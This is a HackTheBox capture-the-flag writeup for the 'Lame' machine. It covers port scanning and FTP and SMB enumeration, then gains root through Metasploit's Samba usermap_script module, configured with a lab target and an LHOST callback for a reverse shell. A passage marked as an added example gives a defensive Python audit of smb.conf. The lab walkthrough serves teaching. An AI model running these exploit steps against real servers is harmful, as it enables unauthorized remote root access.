Lame
Lame writeup by Thamizhiniyan C S
Overview
Hello everyone. In this writeup we are going to solve Lame from HackTheBox.
Link to the machine: https://app.hackthebox.com/machines/1
Let's start 🙌
Connect to the HTB server using the OpenVPN configuration file generated by HTB.
[ Click here to learn more about how to connect to the VPN and access the boxes. ]
After connecting to the VPN service, click on Join Machine to access the machine's IP.
After joining the machine, you can see the IP address of the target machine.
Reconnaissance
Rustscan
First, start the reconnaissance by running rustscan on the target IP address.
Command: rustscan -a 10.10.10.3 -- -A -Pn
Results
From the results, we got the following ports and services running:
Port | Service | Version |
---|---|---|
21 | FTP | vsftpd 2.3.4 |
22 | SSH | OpenSSH 4.7p1 |
139 | netbios-ssn | Samba smbd 3.X - 4.X |
445 | netbios-ssn | Samba smbd 3.X - 4.X |
3632 | distccd | distccd v1 |
Enumerating FTP
First, I started enumerating the FTP service running on port 21.
From the scan results, we can see that anonymous login is allowed for FTP.
So I tried to log in as Anonymous.
Command: ftp 10.10.10.3
username: Anonymous
Password: Anonymous
Found nothing in the FTP anonymous login.
Enumerating SMB
Next, I started to enumerate the SMB service running on port 139. I used the enum4linux tool to enumerate it.
Command: enum4linux -a 10.10.10.3
From the response of enum4linux, I didn't find any interesting shares.
Initial Access
Next, I searched for exploits for the Samba version, Samba smbd 3.X - 4.X, and found that this version is vulnerable to command execution.
To use the above exploit, execute the following commands in msfconsole:
use exploit/multi/samba/usermap_script
set RHOSTS 10.10.10.3
set LHOST tun0
( Here tun0 is the interface that holds your HackTheBox VPN tunnel IP )
run
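Seen from the defender's side, the usermap_script module depends on the Samba `username map script` option being set in smb.conf. The audit below is an added example, not part of the original writeup: it flags that option and any guest-writable share, and the sample configuration and function names are constructed for illustration.

```python
import re

# Constructed sample smb.conf for illustration; not taken from the target box.
SAMPLE_SMB_CONF = """\
[global]
   ; username map script = /bin/false
   User Name  Map Script = /etc/samba/scripts/mapusers.sh
   guest account = \\
      nobody
[tmp]
   public = yes
   writeable = yes
[docs]
   guest ok = yes
"""

YES = ("yes", "true", "1")
READ_ONLY_INVERSES = ("writable", "writeable", "writeok")  # inverted synonyms

def parse_smb_conf(text):
    """Return {section: {param: value}}; names are matched as Samba does,
    ignoring case and whitespace, with synonyms folded onto one key."""
    conf, section, pending = {}, "global", ""
    for raw in text.splitlines():
        line, pending = pending + raw.strip(), ""
        if line.endswith("\\"):            # trailing backslash continues the line
            pending = line[:-1]
        elif line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
        elif line and line[0] not in "#;" and "=" in line:
            name, value = (part.strip() for part in line.split("=", 1))
            key = re.sub(r"\s+", "", name).lower()
            if key in READ_ONLY_INVERSES:
                key, value = "readonly", ("no" if value.lower() in YES else "yes")
            conf.setdefault(section, {})["guestok" if key == "public" else key] = value
    return conf

def audit(conf):
    """Flag the smb.conf settings behind this writeup's SMB findings."""
    findings, defaults = [], conf.get("global", {})
    if "usernamemapscript" in defaults:
        findings.append(f"global: username map script = {defaults['usernamemapscript']}")
    for section, params in conf.items():
        merged = {**defaults, **params}     # [global] values act as share defaults
        guest_ok = merged.get("guestok", "no").lower() in YES
        read_only = merged.get("readonly", "yes").lower() in YES
        if section != "global" and guest_ok and not read_only:
            findings.append(f"{section}: share is writable by guests")
    return findings
```

Running `audit(parse_smb_conf(open("/etc/samba/smb.conf").read()))` on a Samba host lists the settings to remove or tighten; the path is the usual default and may differ per distribution.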
Getting the User Flag
Now we have access to the target machine as root. I searched for the user flag using the following command:
Command: find / -name user.txt
And we have found the user flag.
Getting the Root Flag
Now I searched for the root flag using the same method and found the root flag:
We have successfully found all the flags.
Thank You !!!